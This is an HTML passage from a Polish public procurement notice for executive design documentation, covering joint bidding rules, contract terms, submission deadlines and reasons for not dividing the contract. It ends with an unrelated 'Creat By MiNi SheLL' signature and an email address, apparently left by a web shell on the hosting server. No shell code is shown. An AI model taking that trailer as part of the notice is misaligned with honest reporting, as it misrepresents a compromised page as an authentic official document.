b) tiret 1-2<br/>SWZ, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami przez<br/>Wykonawcę. Wzór wykazu osób stanowi załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych w niniejszym postepowaniu. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z formularzem ofertowym Wykonawca jest zobowiązany złożyć:<br/>1) zobowiązanie innego podmiotu do udostępnienia Wykonawcy zasobów (jeżeli dotyczy) (Załącznik nr 3 a do SWZ),<br/>2) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 4 pzp (jeżeli dotyczy)<br/>(Załącznik nr 4 do SWZ),<br/>3) oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu<br/>z postępowania oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby. (jeżeli dotyczy) (Załącznik nr 6 do SWZ),<br/>5) pełnomocnictwo do podpisywania w imieniu Wykonawcy oferty (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o niepodleganiu<br/>wykluczeniu, spełnianiu warunków udziału<br/>w postępowaniu w zakresie wskazanym przez Zamawiającego, składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te wstępnie potwierdza spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4. W przypadku podmiotów składających ofertę wspólną, warunki, o których mowa w Rozdziale VIII ust. 2 pkt 4 lit. b) SWZ<br/>musi spełniać co najmniej jeden z nich lub wszyscy wykonawcy łącznie, a w przypadku warunku określonego w Rozdziale<br/>VIII ust. 2 pkt 4 lit. a) SWZ musi spełniać co najmniej jeden z nich.<br/>5. W przypadku, gdy ofertę składają Wykonawcy wspólnie w okolicznościach wskazanych w art. 117 ust. 3 p.z.p. (tj. w<br/>odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia), Wykonawcy wspólnie<br/>ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni<br/>wykonawcy (wzór oświadczenia stanowi zał. nr 4 do SWZ).<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>7. Wykonawcy, składający ofertę wspólnie, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>8. Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako pełnomocnik pozostałych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana istotnych postanowień zawartych w Umowie, stanowiącej załącznik nr 9 do SWZ może nastąpić jedynie na<br/>warunkach i w przypadkach w niej określonych, na piśmie pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-20 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin realizacji przedmiotowej usługi - 42 dni, określony w punkcie 4.2.10) ogłoszenia, należy rozumieć jako 6 tygodni<br/>od daty podpisania umowy.<br/>2. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z<br/>okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U z<br/>2024 poz. 507).<br/>3. Zamawiający nie dopuszcza składania ofert częściowych.<br/>Powody niedokonania podziału zamówienia na części:<br/>Z uwagi na charakter i specyfikę zamówienia jakim jest przedmiotowa usługa polegająca na opracowaniu dokumentacji wykonawczej mającej na celu uzupełnienie i uszczegółowienie posiadanej przez Zamawiającego dokumentacji projektowej<br/>tj. projektu architektoniczno-budowlanego, projektu zagospodarowania terenu i projektu technicznego, podział na części<br/>groziłby nadmiernymi utrudnieniami ekonomicznymi i organizacyjnymi związanymi m.in. z koordynacją pracy kilku osób<br/>wyznaczonych do realizacji niniejszego zamówienia. Powierzenie wykonania zamówienia kilku Wykonawcom w znaczący<br/>sposób utrudniłoby organizację realizacji zamówienia. Osiągnięcie prawidłowego wykonania zamówienia jest możliwe tylko<br/>wówczas, jeśli Wykonawca zachowa pełną kontrolę nad jego realizacją. Poszczególne, realizowane elementy dokumentacji<br/>mają bezpośredni wpływ na dalsze prace projektowe i muszą być wykonywane równolegle lub bezpośrednio jedne po<br/>drugich. W związku z tym niezasadne jest rozdzielanie kolejnych etapów realizacji dokumentacji między kilku Wykonawców,<br/>a także określanie zakresu prac i terminów opracowania dokumentacji potencjalnym Wykonawcom. Taki podział stwarzałby<br/>trudności techniczne w koordynacji między sobą poszczególnych opracowań oraz mógłby wpłynąć na wydłużenie czasu<br/>realizacji zamówienia. Potrzebą Zamawiającego jest uzyskanie kompleksowo opracowanej dokumentacji wykonawczej. W<br/>przypadku podziału zamówienia, ryzyka związane z komunikacją, terminowością i kompleksowością obsługi obarczałyby<br/>Zamawiającego. Mając powyższe na uwadze przedmiot zamówienia ze względów technicznych, organizacyjnych i ekonomicznych tworzy nierozerwalną całość.

Creat By MiNi SheLL
Email: jattceo@gmail.com